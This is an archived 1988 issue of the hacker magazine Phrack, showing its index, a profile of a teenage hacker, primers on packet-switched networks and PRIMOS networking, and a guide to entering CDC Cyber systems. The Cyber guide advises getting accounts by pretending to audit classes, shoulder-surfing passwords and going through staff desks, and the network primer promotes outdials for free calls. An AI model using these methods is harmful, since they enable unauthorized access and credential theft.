Phrack #18

EDB-ID:

42829

CVE:

N/A

Author:

phrack

Type:

papers

Platform:

Magazine

Published:

1988-07-06

                               ==Phrack Inc.==

                     Volume Two, Issue 18, Phile #1 of 11

                                    Index
                                    =====
                                June 7, 1988

    Well, Phrack Inc. is still alive but have changed editors again. I,
Crimson Death am now the new editor of Phrack Inc.  The reason why I am the
new editor is because of the previous editors in school and they did not just
have the time for it.  So, if you would like to submit an article for Phrack
Inc. please contact:  Crimson Death, Control C, or Epsilon, or call my BBS
(The Forgotten Realm) or one of the BBSes on the sponsor BBS listing (Found in
PWN Part 1).  We are ALWAYS looking for more files to put in upcoming issues.
Well, that about does it for me.  I hope you enjoy Phrack 18 as much as we at
The Forgotten Realm did bringing it to you.  Later...
                                                  Crimson Death
                                           Sysop of The Forgotten Realm

------------------------------------------------------------------------------

This issue of Phrack Inc. includes the following:

#1  Index of Phrack 18 by Crimson Death                      (02k)
#2  Pro-Phile XI on Ax Murderer by Crimson Death             (04k)
#3  An Introduction to Packet Switched Networks by Epsilon   (12k)
#4  Primos: Primenet, RJE, DPTX by Magic Hasan               (15k)
#5  Hacking CDC's Cyber by Phrozen Ghost                     (12k)
#6  Unix for the Moderate by Urvile                          (11k)
#7  Unix System Security Issues by Jester Sluggo             (27k)
#8  Loop Maintenance Operating System by Control C           (32k)
#9  A Few Things About Networks by Prime Suspect             (21k)
#10 Phrack World News XVIII Part I by Epsilon                (09k)
#11 Phrack World News XVIII Part II by Epsilon               (05k)
==============================================================================


--------------------------------------------------------------------------------


                               ==Phrack Inc.==

                     Volume Two, Issue 18, Phile #2 of 11

                           ==Phrack Pro-Phile XI==

                     Written and Created by Crimson Death

    Welcome to Phrack Pro-Phile XI.  Phrack Pro-Phile is created to bring info
to you, the users, about old or highly important/controversial people.  This
month, I bring to you a name familiar to most in the BBS world...

                                  Ax Murderer
                                  ===========

Ax Murderer is popular to many of stronger names in the P/H community.
------------------------------------------------------------------------------
Personal
========
             Handle:  Ax Murderer
           Call him:  Mike
       Past handles:  None
      Handle origin:  Thought of it while on CompuServe.
      Date of Birth:  10/04/72
Age at current date:  15
             Height:  6' 2''
             Weight:  205 Lbs.
          Eye color:  Brown
         Hair Color:  Brown
          Computers:  IBM PC, Apple II+, Apple IIe
  Sysop/Co-Sysop of:  The Outlet Private, Red-Sector-A, The Autobahn

------------------------------------------------------------------------------
    Ax Murderer started phreaking and hacking in 1983 through the help of some
of his friends.  Members of the Hack/Phreak world which he has met include
Control C, Bad Subscript, The Timelord.  Some of the memorable phreak/hack
BBS's he was/is on included WOPR, OSUNY, Plovernet, Pirate 80, Shadow Spawn,
Metal Shop Private, Sherwood Forest (213), IROC, Dragon Fire, and Shadowland.
His phreaking and hacking knowledge came about with a group of people in which
some included Forest Ranger and The Timelord.

    Ax Murderer is a little more interested in Phreaking than hacking.  He
does like to program however, he can program in 'C', Basic, Pascal, and
Machine Language.

    The only group in which Ax Murderer has been in is Phoneline Phantoms.
------------------------------------------------------------------------------

        Interests:  Telecommunications (Modeming, phreaking, hacking,
                    programming), football, track, cars, and music.

Ax Murderer's Favorite Thing
----------------------------

  His car... (A Buick Grand National)
  His gilrfriend... (Sue)
  Rock Music

Most Memorable Experiences
--------------------------

  Newsweek Incident with Richard Sandza (He was the Judge for the tele-trial)

Some People to Mention
----------------------

Forest Ranger (For introducing me to everyone and getting me on Dragon Fire)
Taran King (For giving me a chance on MSP and the P/H world)
Mind Bender (For having ANY utilities I ever needed)
The Necromancer (Getting me my Apple'cat)
The Titan (Helping me program the BBS)

All for being friends and all around good people and phreaks.
------------------------------------------------------------------------------

    Ax Murderer is out and out against the idea of the destruction of data.
He hated the incident with MIT where the hackers were just hacking it to
destroy files on the system.  He says that it ruins it for the everyone else
and gives 'True Hackers' a bad name.  He hates it when people hack to destroy,
Ax has no respect for anyone who does this today.  Where have all the good
times gone?

------------------------------------------------------------------------------

I hope you enjoyed this phile, look forward to more Phrack Pro-Philes coming
in the near future....  And now for the regularly taken poll from all
interviewees.

Of the general population of phreaks you have met, would you consider most
phreaks, if any, to be computer geeks? "No, not really."  Thanks Mike.

                                          Crimson Death
                                   Sysop of The Forgotten Realm
==============================================================================


--------------------------------------------------------------------------------


                               ==Phrack Inc.==

                     Volume Two, Issue 18, Phile #3 of 11

         _ _ _ _ _____________________________________________ _ _ _ _
         _-_-_-_-                                             -_-_-_-_
         _-_-_-_-             An Introduction To              -_-_-_-_
         _-_-_-_-                                             -_-_-_-_
         _-_-_-_-          Packet Switched Networks           -_-_-_-_
         _-_-_-_-                                             -_-_-_-_
         _-_-_-_-                                             -_-_-_-_
         _-_-_-_-                                             -_-_-_-_
         _-_-_-_-  Written By -                   Revised -   -_-_-_-_
         _-_-_-_-                                             -_-_-_-_
         _-_-_-_-  Epsilon                        05/3/88     -_-_-_-_
         _-_-_-_-_____________________________________________-_-_-_-_


Preface -

   In the past few years, Packet Switched Networks have become a prominent
feature in the world of telecommunications.  These networks have provided ways
of communicating with virtually error-free data, over very large distances.
These networks have become an imperative to many a corporation in the business
world.  In this file we will review some of the basic aspects of Packet
Switched Networks.

Advantages -

   The Packet Switched Network has many advantages to the common user, and
even more to the hacker, which will be reviewed in the next topic.

   The basis of a Packet Switched Network is the Packet Switch.  This network
enables the service user to connect to any number of hosts via a local POTS
dial-up/port. The various hosts pay to be connected to this type of network,
and that's why there is often a surcharge for connection to larger public
services like Compuserve or The Source.

   A Packet Switched Network provides efficient data transfer and lower rates
than normal circuit switched calls, which can be a great convenience if you
are planning to do a lot of transferring of files between you and the host.

   Not only is the communication efficient, it is virtually error free.
Whereas in normal circuit switched calls, there could be a drastic increase in
errors, thus creating a bad transfer of data.

   When using a Packet Switched Network, it is not important that you
communicate at the same baud rate as your host.  A special device regulates
the speed so that the individual packets are sped up or slowed down, according
to your equipment.  Such a device is called a PAD (Packet Assembler
Disassembler).

   A PSN also provides access to a variety of information and news retrieval
services.  The user pays nothing for these calls, because the connections  are
collect. Although the user may have to subscribe to the service to take
advantage of it's services, the connection is usually free, except for a
surcharge on some of the larger subscription services.

Advantages To Hackers -

   Packet Switched Networks, to me, are the best thing to come along since the
phone system.  I'm sure many other hackers feel the same way.  One of the
reasons for this opinion is that when hacking a system, you need not dial out
of your LATA, using codes or otherwise.

   Now, the hacker no longer has to figure out what parameters he has to set
his equipment to, to communicate with a target computer effectively.  All
PSSes use the same protocol, set by international standards.  This protocol is
called X.25.  This protocol is used on every network-to-network call in the
world.

   When operating on a packet switch, you are not only limited to your own
network (As if that wasn't enough already).  You can access other PSSes or
private data networks through gateways which are implemented in your PSN.
There are gateways to virtually every network, from virtually every other
network, except for extremely sensitive or private networks, in which case
would probably be completely isolated from remote access.

   Another advantage with PSNs is that almost everyone has a local port, which
means if you have an outdial (Next paragraph), you can access regular circuit
switched hosts via your local Packet Switched Network port.  Since the ports
are local, you can spend as much time as you want on it for absolutely no
cost.  So think about it.  Access to any feasible network, including overseas
PSNs and packet switches, access to almost any host, access to normal circuit
switched telephone-reachable hosts via an outdial, and with an NUI (Network
User Identity - Login and password entered at the @ prompt on Telenet),
unlimited access to any NUA, reverse-charged or not.

   Due to the recent abuse of long distance companies, the use of codes when
making free calls is getting to be more and more  hazardous.  You may ask, 'Is
there any resort to making free calls without using codes, and without using a
blue  box?'  The answer is yes, but only when using data.  With an outdial,
accessible from your local PSN port, you can make data calls with a remote
modem, almost always connected directly to a server, or a port selector. This
method of communicating is more efficient, safer, and more reliable than using
any code.  Besides, with the implementation of equal access,  and the
elimination of 950 ports, what choice will you have?

Some Important Networks -

   As aforementioned, PSNs are not only used in the United States.  They are
all over the place.  In Europe, Asia, Canada, Africa, etc.  This is a small
summary of some of the more popular PSNs around the world.

         Country          Network Name          *DNIC
         ~~~~~~~          ~~~~~~~ ~~~~           ~~~~
         Germany          Datex-P                2624
         Canada           Datapac                3020
         Italy            Datex-P                0222
         South Africa     Saponet                0655
         Japan            Venus-P                4408
         England          Janet/PSS              2342
         USA              Tymnet                 3106
         USA              Telenet                3110
         USA              Autonet                3126
         USA              RCA                    3113
         Australia        Austpac                0505
         Ireland          Irepac                 2724
         Luxembourg       Luxpac                 2704
         Singapore        Telepac                5252
         France           Transpac               2080
         Switzerland      Telepac                2284
         Sweden           Telepac                2405
         Israel           Isranet                4251
         ~~~~~~~~~        ~~~~~~~                ~~~~
         * - DNIC (Data Network Identification Code)
             Precede DNIC and logical address with a
             '0' when using Telenet.
______________________________________________________________________________

Notes On Above Networks -

   Some countries may have more than one Packet Switching Network.  The ones
listed are the more significant networks for each country.  For example, the
United States has eleven public Packet Switching Networks, but the four I
listed are the major ones.

   Several countries may also share one network, as shown above.  Each country
will have equal access to the network using the basic POTS dial-up ports.

Focus On Telenet -

   Since Telenet is one of the most famous, and highly used PSNs in the United
States, I thought that informing you of some of the more interesting aspects
of this network would be beneficial.

Interconnections With Other Network Types -

   Packet Switched Networks are not the only type of networks which connect a
large capacity of hosts together.  There are also Wide Area Networks, which
operate on a continuous link basis, rather than a packet switched basis.
These networks do not use the standardized X.25 protocol, and can only be
reached by direct dial-ups, or by connecting to a host which has network
access permissions.  The point is, that if you wanted to reach, say, Arpanet
from Telenet, you would have to have access to a host which is connected to
both networks.  This way, you can connect to the target host computer via
Telenet, and use the WAN via the target host.

   WANs aren't the only other networks you can access.  Also, connections to
other small, private, interoffice LANs are quite common and quite feasible.

Connections To International NUAs via NUIs -

   When using an NUI, at the prompt, type 0+DNIC+NUA.  After your connection
is established, proceed to use the system you've reached.

Private Data Networks -

   Within the large Packet Switched Networks that are accessible to us there
are also smaller private networks.  These networks can sometimes be very
interesting as they may contain many different systems.  A way to identify a
private network is by looking at the three digit prefix.  Most prefixes
accessible by Telenet are based on area codes.  Private networks often have a
prefix that has nothing to do with any area code. (Ex. 322, 421, 224, 144)
Those prefixes are not real networks, just examples.

   Inside these private networks, there are often  smaller networks which are
connected with some type of host selector or gateway server.  If you find
something like this, there may be hosts that can be accessed only by this port
selector/server, and not by the normal prefix.  It is best to find out what
these other addresses translate to, in case you are not able to access the
server for some reason.  That way, you always have a backup method of reaching
the target system (Usually the addresses that are accessed by a gateway
server/port selector translate to normal NUAs accessible from your Telenet
port).

   When exploring a private network, keep in mind that since these networks
are smaller, they would most likely be watched more closely during business
hours then say Telenet or Tymnet.  Try to keep your scanning and tinkering
down to a minimum on business hours to avoid any unnecessary trouble.
Remember, things tend to last longer if you don't abuse the hell out of them.

Summary -

   I hope this file helped you out a bit, and at least gave you a general idea
of what PSNs are used for, and some of the advantages of using these networks.
If you can find something interesting during your explorations of PSNs, or
Private Data Networks, share it, and spread the knowledge around.  Definitely
exploit what you've found, and use it to your advantage, but don't abuse it.

If you have any questions or comments, you reach me on -

             The FreeWorld II/Central Office/Forgotten Realm/TOP.

   I hope you enjoyed my file.  Thanks for your time.  I should be writing a
follow up article to this one as soon as I can.  Stay safe..

         - Epsilon
______________________________________________________________________________

                                - Thanks To -

         Prime Suspect/Sir Qix/The Technic/Empty Promise/The Leftist
______________________________________________________________________________


--------------------------------------------------------------------------------


                               ==Phrack Inc.==

                     Volume Two, Issue 18, Phile #4 of 11

   -------------------------------------------------------------------------
   -                                                                       -
   -                                                                       -
   -           PRIMOS:                                                     -
   -                       NETWORK  COMMUNICATIONS                         -
   -                                                                       -
   -                       PRIMENET, RJE, DPTX                             -
   -                                                                       -
   -                                                                       -
   - Presented by Magic Hasan                                   June 1988  -
   -------------------------------------------------------------------------


   PRIME's uniform operating system, PRIMOS, supports a wide range of
communications products to suit any distributed processing need.  The PRIMENET
distributed networking facility provides complete local and remote network
communication services for all PRIME systems.  PRIME's Remote Job Entry (RJE)
products enable multi-user PRIME systems to emulate IBM, CDC, Univac,
Honeywell and ICL remote job entry terminals over synchronous communication
lines. PRIME's Distributed Processing Terminal Executive (DPTX) allows users
to construct communication networks with PRIME and IBM-compatible equipment.

                                   PRIMENET
                                   --------

   PRIMENET provides complete local and remote network communication services
for all PRIME systems.  PRIMENET networking software lets a user or process on
one PRIME system communicate with any other PRIME system in the network
without concern for any protocol details.  A user can log in to any computer
in the network from any terminal in the network.  With PRIMENET, networking
software processes running concurrently on different systems can communicate
interactively.  PRIMENET allows transparent access to any system in the
network without burdening the user with extra commands.

   PRIMENET has been designed and implemented so that user interface is simple
and transparent.  Running on a remote system from a local node of the network
or accessing remote files requires no reprogramming of user applications or
extensive user training.  All the intricacies and communication protocols of
the network are handled by the PRIMENET software.  For both the local and
remote networks, PRIMENET will allow users to share documents, files, and
programs and use any disk or printer configured in the network.

   For a local network between physically adjacent systems, PRIME offers the
high-performance microprocessor, the PRIMENET Node Controller (PNC).  The
controller users direct memory access for low overhead and allows loosely
coupled nodes to share resources in an efficient manner.  The PNCs for each
system are connected to each other with a coaxial cable to form a high-speed
ring network, with up to 750 feet (230 meters) between any two systems.

   Any system in the PNC ring can establish virtual circuits with any other
system, making PNC-based networks "fully connected" with a direct path between
each pair of systems.  The ring has sufficient bandwidth (1 MB per second) and
addressing capability to accommodate over 200 systems in a ring structure;
however, PRIMENET currently supports up to sixteen systems on a ring to
operate as a single local network.

   The PRIMENET Node Controller is designed to assure continuity of operation
in the event that one of the systems fails.  One system can be removed from
the network or restored to on-line status without disturbing the operations of
the other system.  An active node is unaware of messages destined for other
nodes in the network, and the CPU is notified only when a message for that
node has been correctly received.

   Synchronous communications over dedicated leased lines or dial-up lines is
provided through the Multiple Data Link Controller (MDLC).  This controller
handles certain protocol formatting and data transfer functions normally
performed by the operating system in other computers.  The controller's
microprogrammed architecture increases throughput by eliminating many tasks
from central processor overhead.

   The communications controller also supports multiple protocols for
packet-switched communications with Public Data Networks such as the United
States' TELENET and TYMNET, the Canadian DATAPAC, Great Britain's
International Packet Switching Service (IPSS), France's TRANSPAC, and the
European Packet Switching Network, EURONET.  Most Public Data Networks require
computers to use the CCITT X.25 protocol to deal with the management of
virtual circuits between a system and others in the network.  The synchronous
communications controller supports this protocol.  PRIME can provide the X.25
protocol for use with the PRIMENET networking software without modification to
the existing hardware configuration.

   PRIMENET software offers three distinct sets of services.  The
Inter-Program Communication Facility (IPCF) lets programs running under the
PRIMOS operating system establish communications paths (Virtual circuits) to
programs in the same or another PRIME system, or in other vendors' systems
supporting the CCITT X.25 standard for packet switching networks.  The
Interactive Terminal Support (ITS) facility permits terminals attached to a
packet switching network, or to another PRIME system, to log-in to a PRIME
system with the same capabilities they would have if they were directly
attached to the system.  The File Access Manager (FAM) allows terminal users
or programs running under the PRIMOS operating system to utilize files
physically stored on other PRIME systems in a network.  Remote file operations
are logically transparent to the application program.  This means no new
applications and commands need  to be learned for network operation.

   The IPCF facility allows programs in a PRIME computer to exchange data with
programs in the same computer, another PRIME computer, or another vendor's
computer, assuming that that vendor supports X.25.  This feature is the most
flexible and powerful one that any network software package can provide.  It
basically allows an applications programmer to split up a program, so that
different pieces of the program execute on different machines a network.  Each
program component can be located close to the resource (terminals, data,
special peripherals, etc.) it must handle, decode the various pieces and
exchange data as needed, using whatever message formats the application
designer deems appropriate.  The programmer sees PRIMENET's IPCF as a series
of pipes through which data can flow.  The mechanics of how the data flows are
invisible; it just "happens" when the appropriate services are requested.  If
the two programs happen to end up on the same machine, the IPCF mechanism
still works.  The IPCF offers the following advantages:

        1)  The User does not need to understand the detailed
            mechanisms of communications software in order to
            communicate.
        2)  Calls are device-independent.  The same program will
            work over physical links implemented by the local node
            controller (local network), leased lines, or a packet
            network.
        3)  Programs on one system can concurrently communicate
            with programs on other systems using a single
            communications controller.  PRIMENET handles all
            multiplexing of communications facilities.
        4)  A single program can establish multiple virtual
            circuits to other programs in the network.

   PRIMENET's ITS facility allows an interactive terminal to have access to
any machine in the network.  This means that terminals can be connected into
an X.25 packet network along with PRIME computers.  Terminal traffic between
two systems is multiplexed over the same physical facilities as inter-program
data, so no additional hardware is needed to share terminals between systems.

   This feature is ordinarily invisible to user programs, which cannot
distinguish data entering via a packet network from data coming in over AMLC
lines.  A variant of the IPCF facility allows users to include the terminal
handling protocol code in their own virtual space, thus enabling them to
control multiple terminals on the packet network within one program.
Terminals entering PRIMOS in this fashion do not pass through the usual log-in
facility, but are immediately connected to the application program they
request. (The application program provides whatever security checking is
required.)

   The result is the most effective available means to provide multi-system
access to a single terminal, with much lower costs for data communications and
a network which is truly available to all users without the expense of
building a complicated private network of multiplexors and concentrators.

   By utilizing PRIMENET's File Access Manager (FAM), programs running under
PRIMOS can access files on other PRIME systems using the same mechanisms used
to access local files.  This feature allows users to move from a single-system
environment to a multiple-system one without difficulty.  When a program and
the files it uses are separated into two (or more) systems the File Access
Management (FAM)is automatically called upon whenever the program attempts to
use the file.  Remote file operations are logically  transparent to the user
or program.

   When a request to locate a file or directory cannot be satisfied locally,
the File Access Manager is invoked to find the data elsewhere in the network.
PRIMOS initiates a remote procedure call to the remote system and suspends the
user.  This procedure call is received by an answering slave process on the
remote system, which performs the requested operation and returns data via
subroutine parameters.  The slave process on the remote system is dedicated to
its calling master process (user) on the local system until released.  A
master process (user) can have a slave process on each of several remote
systems simultaneously.  This means that each user has a dedicated connection
for the duration of the remote access activity so many requests  can be
handled in parallel.

   FAM operation is independent of the specific network hardware connecting
the nodes.  There is no need to rewrite programs or learn new commands when
moving to the network environment.  Furthermore, the user need only be
logged-in to one system in the network, regardless of the location of the
file.  Files on the local system or remote systems can be accessed dynamically
by file name within a program, using the language-specific open and close
statements.  No external job control language statements are needed for the
program to access files. Inter-host file transfers and editing can be
performed using the same PRIMOS utilities within the local system by
referencing the remote files with their actual file names.

                                REMOTE JOB ENTRY
                                ----------------

   PRIME's Remote Job Entry (RJE) software enables a PRIME system to emulate
IBM, CDC, Univac, Honeywell and ICL remote job entry terminals over
synchronous communication lines.  PRIME's RJE provides the same communications
and peripheral support as the RJE terminals they emulate, appearing to the
host processor to be those terminals.  All PRIME  RJE products provide three
unique benefits:

        * PRIME RJE is designed to communicate with multiple
          remote sites simultaneously.

        * PRIME RJE enables any terminal connected to a PRIME system to
          submit jobs for transmission to remote processors, eliminating the
          requirement for dedicated terminals or RJE stations at each
          location.

        * PRIME's mainframe capabilities permit concurrent running of RJE
          emulators, program development and production work.

   PRIME's RJE supports half-duplex, point-to-point, synchronous
communications and operates over dial-up and dedicated lines.  It is fully
supported by the PRIMOS operating system.


                 DISTRIBUTED PROCESSING TERMINAL EXECUTIVE (DPTX)
                 ------------------------------------------------

   PRIME's Distributed Processing Terminal Executive (DPTX) allows users to
construct communication networks with PRIME and IBM-compatible equipment.
DPTX conforms to IBM 3271/3277 Display System protocols, and can be integrated
into networks containing IBM mainframes, terminals and printers without
changing application code or access methods and operates under the PRIMOS
operating system.

   DPTX is compatible with all IBM 370 systems and a variety of access methods
and teleprocessing monitors:  BTAM, TCAM, VTAM, IMS/VS, CIC/VS, and TSO.  They
provide transmission speeds up to 9600 bps using IBM's Binary Synchronous
Communications (BSC) protocol.

   DPTX is comprised of three software modules that allow PRIME systems to
emulate and support IBM or IBM compatible 3271/3277 Display Systems.  One
module, Data Stream Compatibility (DPTX/DSC), allows the PRIME system to
emulate the operation of a 3271 on the IBM system.  This enables both terminal
user and application programs (interactive or batch) on the PRIME System to
reach application programs on an IBM mainframe.  A second module, Terminal
Support Facility (DPTX/TSF), allows a PRIME system to control a network of IBM
3271/3277 devices.  This enables terminal users to reach application programs
on a PRIME computer.  The third module, Transparent Connect Facility
(DPTX/TCF), combines the functions of modules one and two with additional
software allowing 3277 terminal users to to reach programs on a IBM mainframe,
even though the terminal subsystem is physically connected to a PRIME system,
which is connected to an IBM system.

   PRIMOS offers a variety of different Communication applications.  Being
able to utilize these applications to their fullest extent can make life easy
for a Primos "enthusiast."  If you're a beginner with Primos, the best way to
learn more, as with any other system, is to get some "hands-on" experience.
Look forward to seeing some beginner PRIMOS files in the near future.  -MH
------------------------------------------------------------------------------

Special thanks to PRIME INC. for unwittingly providing the text for this
article.
===============================================================================


--------------------------------------------------------------------------------


                               ==Phrack Inc.==

                     Volume Two, Issue 18, Phile #5 of 11

    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
   -=                                                                     =-
   -=               Hacking Control Data Corporation's Cyber              =-
   -=                                                                     =-
   -=               Written by Phrozen Ghost, April 23, 1988              =-
   -=                                                                     =-
   -=                   Exclusively for Phrack Magazine                   =-
   -=                                                                     =-
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

  This article will cover getting into and using NOS (Networking Operating
System) version 2.5.2 running on a Cyber 730 computer.  Cybers generally run
this operating system so I will just refer to this environ- ment as Cyber.
Also, Cyber is a slow and outdated operating system that is primarily used
only for college campuses for running compilers.  First off after you have
scanned a bunch of carriers you will need to know how Cyber identifies itself.
It goes like this:

WELCOME TO THE NOS SOFTWARE SYSTEM.
COPYRIGHT CONTROL DATA 1978, 1987.

88/02/16. 02.36.53. N265100
CSUS CYBER 170-730.                     NOS 2.5.2-678/3.
FAMILY:

You would normally just hit return at the family prompt.  Next prompt is:

USER NAME:

Usernames are in the format  abcdxxx  where a is the location of where the
account is being used from (A-Z).  the b is a grouping specifying privs and
limits for the account- usually A-G -where A is the lowest access.  Some
examples of how they would be used in a college system:
A = lowest access - class accounts for students
B = slightly higher than A (for students working on large projects)
C = Much higher limits, these accounts are usually not too hard to get and
    they will normally last a long time!  Lab assistants use these.
D = Instructors, Lecturers, Professors.. etc..
E = same... (very hard to get these!)

The C and D positions are usually constant according to the groupings.
For example, a class would have accounts ranging from NADRAAA-AZZ
                                                          ^^^ ^^^
                                                 These can also be digits

There are also special operator accounts which start with digits instead of
numbers. (ie 7ETPDOC)  These accounts can run programs such as the monitor
which can observe any tty connected to the system...

The next prompt will be for the password, student account passwords cannot be
changed and are 7 random letters by default, other account passwords can be
changed.  You get 3 tries until you are logged out.  It is very difficult if
not impossible to use a brute force hacker or try to guess someone's account..
so how do you get on?  Here's one easy way... Go down to your local college
(make sure they have a Cyber computer!) then just buy a class catalog (they
only cost around 50 cents) or you could look, borrow, steal someone else's...
then find a pascal or fortran class that fits your schedule!  You will only
have to attend the class 3 or 4 times max.  Once you get there you should have
no trouble, but if the instructor asks you questions about why you are not on
the roll, just tell him that you are auditing the class (taking it without
enrolling so it won't affect your GPA).  The instructor will usually pass out
accounts on the 3rd or 4th day of class.. this method also works well with
just about any system they have on campus!  Another way to get accounts is to
go down to the computer lab and start snooping!  Look over someone's shoulder
while they type in their password, or look thru someone's papers while they're
in the bathroom, or look thru the assistants desk while he is helping
someone... (I have acquired accounts both ways, and the first way is a lot
easier with less hassles)  Also, you can use commas instead of returns when
entering username and password.
Example:  at the family prompt, you could type  ,nadrajf,dsfgkcd
                     or at the username prompt   nadrajf,dsfgkcd

After you enter your info, the system will respond with:

JSN: APXV, NAMIAF
/

The 'APXV, NAMIAF' could be different depending on what job you were attached
to.  The help program looks a lot neater if you have vt100 emulation, if you
do, type [screen,vt100] (don't type the brackets! from now on, all commands I
refer to will be enclosed in brackets) Then type help for an extensive
tutorial or a list of commands. Your best bet at this point is to buy a quick
reference guide at the campus because I am only going to describe the most
useful commands. The / means you are in the batch subsystem, there are usually
6 or 7 other subsystems like basic, fortran, etc... return to batch mode by
typing [batch].

Some useful commands:

   CATLIST    -  will show permanent files in your directory.
   ENQUIRE,F  -  displays temporary files in your workspace.
   LIMITS     -  displays your privileges.
   INFO       -  get more on-line help.
   R          -  re-execute last command.
   GET,fn     -  loads fn into the local file area.
   CHANGE     -  change certain specs on a file.
   PERMIT     -  allow other users to use one of your files.
   REWIND,*   -  rewinds all your local files.
   NEW,fn     -  creates new file.
   PURGE      -  deletes files.
   LIST,F=fn  -  list file.
   UPROC      -  create an auto-execute procedure file.
   MAIL       -  send/receive private mail.
   BYE        -  logoff.

Use the [helpme,cmd] command for the exact syntax and parameters of these
commands.  There are also several machine specific 'application' programs such
as pascal, fortran, spitbol, millions of others that you can look up with the
INFO command... there are also the text editors; edit, xedit, and fse (full
screen editor).  Xedit is the easiest to use if you are not at a Telray 1061
terminal and it has full documentation.  Simply type [xedit,fn] to edit the
file 'fn'.

Special control characters used with Cyber:

Control S and Control Q work normally, the terminate character is Control T
followed by a carriage return.  If you wanted to break out of an auto-execute
login program, you would have to hit ^T C/R very fast and repetitively in
order to break into the batch subsystem.  Control Z is used to set environment
variables and execute special low level commands, example: [^Z TM C/R] this
will terminate your connection...

So now you're thinking, what the hell is Cyber good for?  Well, they won't
have any phone company records, and you can't get credit information from one,
and I am not going to tell you how to crash it since crashing systems is a
sin.  There are uses for a Cyber though,  one handy use is to set up a chat
system, as there are normally 30-40 lines going into a large university Cyber
system.  I have the source for a chat program called the communicator that I
will be releasing soon.  Another use is some kind of underground information
exchange that people frequently set up on other systems, this can easily be
done with Cyber.

Procedure files:

A procedure file is similar to a batch file for MS-DOS, and a shell script for
UNIX.  You can make a procedure file auto-execute by using the UPROC command
like [uproc,auto] will make the file 'auto', auto execute.  There is also a
special procedure file called the procfile in which any procedure may be
accessed by simply a - in front of it.  If your procfile read:

.proc,cn.
.*  sample procedure
$catlist/un=7etpdoc.
$exit.

then you could simply type -cn and the / prompt and it would execute the
catlist command.  Now back to uprocs,  you could easily write a whole BBS in a
procedure file or say you wanted to run a chat system and you did not want
people to change the password on your account, you could do this:

.proc,chat,
PW"Password: "=(*A).
$ife,PW="cyber",yes.
   $chat.
   $revert.
   $bye.
$else,yes.
   $note./Wrong password, try again/.
   $revert.
   $bye.
$endif,yes.

This procedure will ask the user for a password and if he doesn't type "cyber"
he will be logged off.  If he does get it right then he will be dumped into
the chat program and as soon as he exits the chat program, he will be logged
off.  This way, the user cannot get into the batch subsystem and change your
password or otherwise screw around with the account.  The following is a
listing of the procfil that I use on my local system, it has a lot of handy
utilities and examples...

----  cut here  ----

.PROC,B.
.******BYE******
$DAYFILE.
$NOTE.//////////////////////////
$ASCII.
$BYE.
$REVERT,NOLIST.
#EOR
.PROC,TIME.
.******GIVES DAY AND TIME******
$NOTE./THE CURRENT DAY AND TIME IS/
$FIND,CLOCK./
$REVERT,NOLIST.
#EOR
.PROC,SIGN*I,IN.
.******SIGN PRINT UTILITY******.
$GET,IN.
$FIND,SIGN,#I=IN,#L=OUT.
$NOTE./TO PRINT, TYPE:   PRINT,OUT,CC,RPS=??/
$REVERT,NOLIST.
#EOR
.PROC,TA.
.******TALK******
$SACFIND,AID,COMM.
$REVERT,NOLIST.
#EOR
.PROC,DIR,UN=,FILE=.
.******DIRECTORY LISTING OF PERMANENT FILES******
$GET(ZZZZDIR=CAT/#UN=1GTL0CL)
ZZZZDIR(FILE,#UN=UN)
$RETURN(ZZZZDIR)
$REVERT,NOLIST.
#EOR
.PROC,Z19.
.******SET SCREEN TO Z19******
$SCREEN,Z19.
$NOTE./SCREEN,Z19.
$REVERT,NOLIST.
#EOR
.PROC,VT.
.******SET SCREEN TO VT100******
$SCREEN,VT100.
$NOTE./SCREEN,VT100.
$REVERT,NOLIST
#EOR
.PROC,SC.
.******SET SCREEN TO T10******
$SCREEN,T10.
$NOTE./SCREEN,T10.
$REVERT,NOLIST
#EOR
.PROC,C.
.******CATLIST******
$CATLIST.
$REVERT,NOLIST.
#EOR
.PROC,CA.
.******CATLIST,LO=F******
$CATLIST,LO=F.
$REVERT,NOLIST.
#EOR
.PROC,MT.
.******BBS******
$SACFIND,AID,MTAB.
$REVERT,NOLIST.
#EOR
.PROC,LI,FILE=.
.******LIST FILE******
$GET,FILE.
$ASCII.
$COPY(FILE)
$REVERT.
$EXIT.
$CSET(NORMAL)
$REVERT,NOLIST. WHERE IS THAT FILE??
#EOR
.PROC,LOCAL.
.******DIRECTORY OF LOCAL FILES******
$RETURN(PROCLIB,YYYYBAD,YYYYPRC)
$GET(QQQFILE=ENQF/UN=1GTL0CL)
QQQFILE.
$REVERT,NOLIST.
$EXIT.
$REVERT. FILES ERROR
#EOR
.PROC,RL.
.******RAISE LIMITS******
$SETASL(*)
$SETJSL(*)
$SETTL(*)
$CSET(ASCII)
$NOTE./ Limits now at max validated levels.
$CSET(NORMAL)
$REVERT,NOLIST.
#EOR
.PROC,CL.
.******CLEAR******
$CLEAR,*.
$CSET(ASCII)
$NOTE./LOCAL FILE AREA CLEARED
$REVERT,NOLIST.
#EOR
.PROC,P,FILE=THING,LST=LIST.
.***********************************************************
$CLEAR.
$GET(FILE)
$PASCAL4,FILE,LST.
$REVERT.
$EXIT.
$REWIND,*.
$CSET(ASCII)
$COPY(LIST)
$CSET(NORMAL)
$REVERT,NOLIST.
#EOR
.PROC,RE.
.******REWIND******
$REWIND,*.
$CSET(ASCII)
$NOTE./REWOUND.
$REVERT,NOLIST.
#EOR
.PROC,FOR,FILE,LST=LIST.
.********************************************************************
$CLEAR.
$GET(FILE)
$FTN5,I=FILE,L=LST.
$REPLACE(LST=L)
$CSET(ASCII)
$REVERT. Fortran Compiled
$EXIT.
$REWIND,*.
$COPY(LST)
$REVERT. That's all folks.
#EOR
.PROC,WAR.
.******WARBLES******
$SACFIND,AID,WAR.
$REVERT,NOLIST.
#EOR
.PROC,M.
.******MAIL/CHECK******
$MAIL/CHECK.
$REVERT,NOLIST.
#EOR
.PROC,MA.
.******ENTER MAIL******
$MAIL.
$REVERT,NOLIST.
#EOR
.PROC,HE,FILE=SUMPROC,UN=.
.******HELP FILE******
$GET,FILE/#UN=UN.
$COPY(FILE)
$REVERT.
$EXIT.
$REVERT,NOLIST.
#EOR
.PROC,DYNAMO.
.******WHO KNOWS??******
$GET,DYNMEXP/UN=7ETPDOC.
$SKIPR,DYNMEXP.
$COPYBR,DYNMEXP,GO.
$FIND,DYNAMO,GO.
$REVERT,NOLIST.
#EOR
#EOR
